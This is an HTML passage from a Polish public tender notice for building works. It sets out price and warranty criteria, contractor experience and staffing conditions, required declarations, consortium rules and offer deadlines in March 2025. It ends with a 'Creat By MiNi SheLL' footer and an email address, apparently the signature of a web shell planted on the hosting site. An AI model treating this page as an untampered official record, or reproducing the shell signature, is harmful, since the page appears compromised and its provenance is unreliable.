oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu, dotyczące zdolności technicznej i zawodowej, tj.:<br/>1)	W odniesieniu do Wykonawcy:<br/>Warunkiem udziału w postępowaniu jest wykonanie należycie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jednego zadania, które obejmowało swym zakresem roboty budowlane polegające na budowie, przebudowie lub rozbudowie budynku o wartości nie mniejszej niż 400 000,00 zł (słownie: czterysta tysięcy złotych 00/100) brutto.<br/><br/>Uwaga:<br/>- za roboty zakończone uznaje się takie, dla których wystawiono Świadectwo przejęcia, Protokół końcowego odbioru lub inny dokument, potwierdzający odbiór ich przez Inwestora;<br/>- wartości podane w innych walutach, niż wskazane przez Zamawiającego, należy przeliczyć w oparciu o średni kurs NBP ogłoszony na dzień wszczęcia niniejszego postępowania.<br/><br/>Dowodem potwierdzającym czy usługi zostały wykonane należycie mogą być m.in.:<br/>- referencje,<br/>- inne dokumenty wystawione przez podmiot, na rzecz którego zostały wykonane usługi.<br/><br/>2) W odniesieniu do osób skierowanych przez Wykonawcę do realizacji zamówienia:<br/>Warunkiem udziału w postępowaniu jest wskazanie przez Wykonawcę co najmniej jednej osoby przewidzianej do pełnienia funkcji Kierownika budowy posiadającego uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz doświadczenie przy realizacji co najmniej jednego zadania, które obejmowało swoim zakresem roboty budowlane polegające na budowie, przebudowie lub rozbudowie budynku o wartości nie mniejszej niż 100 000,00 zł (słownie: sto tysięcy złotych 00/100) brutto. <br/><br/>Zamawiający wymaga od Wykonawców wskazania w dokumentacji imienia i nazwiska osoby odpowiedzialnej za kierowanie pracami wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tej osoby i oświadczeniem o spełnianiu przez nią warunków określonych w SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu, Zamawiający wymagał będzie od Wykonawcy którego oferta została najwyżej oceniona złożenia następujących podmiotowych środków dowodowych:<br/>a)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem (Zamawiający wezwie Wykonawcę do złożenia ww. podmiotowego środka dowodowego, tylko jeśli wykonawca nie wskaże podmiotowych środków dowodowych, które można uzyskać za pośrednictwem bezpłatnych i ogólnodostępnych baz danych oraz danych umożliwiających dostęp do tych środków w formularzu oświadczenia składanego wraz z ofertą);<br/>b)	oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej – zgodnie ze wzorem określonym w Zał. Nr 4 – Grupa kapitałowa. Wraz ze złożeniem oświadczenia, w przypadku przynależności do tej samej grupy kapitałowej, Wykonawca może przedstawić dowody potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. Oświadczenie należy złożyć w oryginale. <br/><br/>Uwaga!<br/>Ww. podmiotowe środki dowodowe na potwierdzenie braku wykluczenia przedstawia odrębnie:<br/>- Wykonawca;<br/>- Wykonawca wspólnie ubiegający się o udzielenie zamówienia publicznego;<br/>- Podmiot, na którego powołuje się Wykonawca celem spełnienia warunków udziału w postępowaniu;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu, Zamawiający wymagał będzie od Wykonawcy którego oferta została najwyżej oceniona złożenia następujących podmiotowych środków dowodowych:<br/>a)	Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających, czy te roboty zostały wykonane należycie – Zał. Nr 6.<br/>b)	Wykaz osób – Zał. Nr 7.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zgodnie z art. 107 ust. 1 ustawy, każdy Wykonawca zobowiązany jest złożyć wraz z ofertą przedmiotowe środki dowodowe potwierdzające, że przedmiot zamówienia obejmujący dostawę wyposażenia spełnia wymagania Zamawiającego.<br/>2.	Zamawiający wymaga złożenia przedmiotowych środków dowodowych <br/>w odniesieniu do elementu zamówienia publicznego dotyczącego dostaw tj.: Szczegółowy zakres dostaw – Zał. Nr 10 – wypełniony przez Wykonawcę <br/>z wskazaniem parametrów oferowanych produktów. Niniejszy dokument będzie służył Zamawiającemu do weryfikacji zgodności oferowanych produktów <br/>z wymaganiami Zamawiającego.<br/>3.	Przedmiotowe środki dowodowe nie podlegają ponownemu złożeniu, uzupełnieniu lub poprawie. Jeśli Wykonawca nie złoży wraz z ofertą wymaganych przedmiotowych środków dowodowych, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 2 lit. c.<br/>4.	Przedmiotowe środki dowodowe, składa się w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą należy złożyć:<br/>1)	Kosztorys ofertowy (z cenami jednostkowymi i wartością robót) sporządzone metodą kalkulacji uproszczonej w oparciu o udostępnione przez Zamawiającego Przedmiary robót. <br/>Kosztorys ofertowy będzie miał dla Zamawiającego charakter poglądowy i informacyjny.<br/>2)	Szczegółowy zakres dostaw – Zał. Nr 10 – wypełniony przez Wykonawcę z wskazaniem parametrów oferowanych produktów;<br/>3)	Oświadczenie niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu – zgodnie ze wzorem określonym w Zał. Nr 2, stanowiące dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe. Oświadczenie, pod rygorem nieważności należy złożyć w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym – odrębnie w odniesieniu do:<br/>a)	Wykonawcy;<br/>b)	Wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>c)	Podmiotu udostępniającego zasoby, na którego potencjał powołuje się<br/>4)	Zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia, lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów – zgodnie ze wzorem określonym w Zał. Nr 3 (jedynie w przypadku, gdy Wykonawca, wykazując spełnianie warunków udziału w postępowaniu polega na zdolnościach technicznych i zawodowych innych podmiotów na zasadach określonych w art. 118 ustawy);<br/>5)	Pełnomocnictwo do podpisania oferty określające jego zakres (jedynie <br/>w przypadku, gdy ofertę podpisuje upełnomocniony przedstawiciel Wykonawcy, a jego umocowanie do podpisania oferty nie wynika wprost z dokumentów rejestrowych). <br/>6)	Oświadczenie Wykonawców występujących wspólnie ubiegających się o udzielenie zamówienia – zgodnie ze wzorem określonym w Zał. Nr 8 (jedynie w przypadku wspólnego ubiegania się o zamówienie);<br/>7)	Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia ewentualnie umowa o współdziałaniu, z której wynikać będzie przedmiotowe pełnomocnictwo (jedynie w przypadku wspólnego ubiegania się o zamówienie). <br/>Pełnomocnictwo powinno zawierać co najmniej wskazanie:<br/>- postępowania o zamówienie publiczne, którego dotyczy,<br/>- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku gdy oferta Wykonawców wspólnie ubiegających się o udzielenia zamówienia zostanie wybrana, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego kopię umowy regulującej współpracę tych Wykonawców, przy czym termin na jaki zostało zawarte konsorcjum, nie może być krótszy niż termin realizacji zamówienia;<br/>2)	Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wraz z ofertą pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia ewentualnie umowa o współdziałaniu, z której wynikać będzie przedmiotowe pełnomocnictwo (jedynie w przypadku wspólnego ubiegania się o zamówienie).<br/>3)	Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>4)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: <br/>a)	spełnianie warunków udziału w postępowaniu Wykonawcy wykazują łącznie. Zamawiający nie precyzuje szczególnego sposobu spełniania warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>b)	żaden z nich nie może podlegać wykluczeniu w okolicznościach, o których mowa w art. 108 ust. 1, art. 109 ust. 1 pkt 4 ustawy Pzp oraz art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach;<br/>5)	W odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie – zgodnie ze wzorem określonym w Zał. Nr 8, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy.<br/>6)	Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa:<br/>a)	wraz z ofertą, oświadczenie – zgodnie ze wzorem określonym w Zał. Nr 2 stanowiące dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>b)	na wezwanie Zamawiającego, podmiotowe środki dowodowe –potwierdzające brak podstaw wykluczenia z postępowania;<br/>zaś pozostałe dokumenty składane są wspólnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z Zał. Nr 5 - Projekt umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-17 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1053937</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-17 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-14</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com